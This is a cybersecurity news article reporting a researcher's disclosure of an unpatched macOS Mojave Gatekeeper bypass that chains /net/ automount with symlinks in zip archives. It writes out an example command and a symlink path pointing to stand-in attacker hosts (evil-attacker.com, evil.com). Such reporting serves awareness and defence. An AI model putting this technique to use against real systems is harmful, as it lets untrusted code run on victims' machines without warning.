Home > Cyber News > Unpatched MacOS X GateKeeper Bypass Leads to Arbitrary Code Execution

Unpatched MacOS X GateKeeper Bypass Leads to Arbitrary Code Execution

An unpatched vulnerability in macOS 10.14.5 also known as Mojave was recently discovered. The flaw could allow an attacker to execute arbitrary code without the need of user interaction, thus bypassing Gatekeeper.

This discovery comes from researcher Filippo Cavallarin from Segment, an Italy-based cybersecurity company. “On MacOS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,” the researcher wrote.

How is the Gatekeeper bypass possible?

First, it should be noted that it’s in Gatekeeper’s design to accept both external drives and network shares as safe location, allowing apps that they contain to run flawlessly. However, by putting together two legitimate features of macOS, it is possible to deceive the Gatekeeper and its “intended behavior”.

So, what are these features? The first one allows a user to automatically mount a network share by simply accepting a path beginning with “/net/”:

For example
ls /net/evil-attacker.com/sharedfolder/
will make the os read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS.

The other feature is about zip archives containing symbolic links that point to arbitrary locations. Furthermore, the software that decompresses zip files on macOS doesn’t perform checks on the symlinks prior to creating them, the researcher explained.

How would an attack work? An attacker could craft a zip file with a symbolic link to an automount hacker-controlled endpoint (ex Documents -> /net/evil.com/Documents) and could send it to a targeted system. The user would download the malicious archive, and would extract the malicious file without suspecting anything.

Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this tecnique very effective and hard to spot, the researcher noted.

There’s also a video demonstration of how this Gatekeeper bypass works.

Related: Windows .exe File Bypasses Gatekeeper and Downloads Malware on Macs

This is not the first case of macOS build-in protection a.k.a. Gatekeeper being bypassed. In February this year, Trend Micro security researchers discovered that a malicious Windows .exe file could infect Mac computers, and could download infostealer malware accompanied by adware on their systems.

In that case, the .exe files were able to evade Gatekeeper’s protection because they were not checked by the software, designed to check only native Mac files. This could lead to bypassing the code signature check and verification.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim

More Posts

Follow Me:

Leave a Comment

Your email address will not be published. Required fields are marked *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Privacy Policy.
I Agree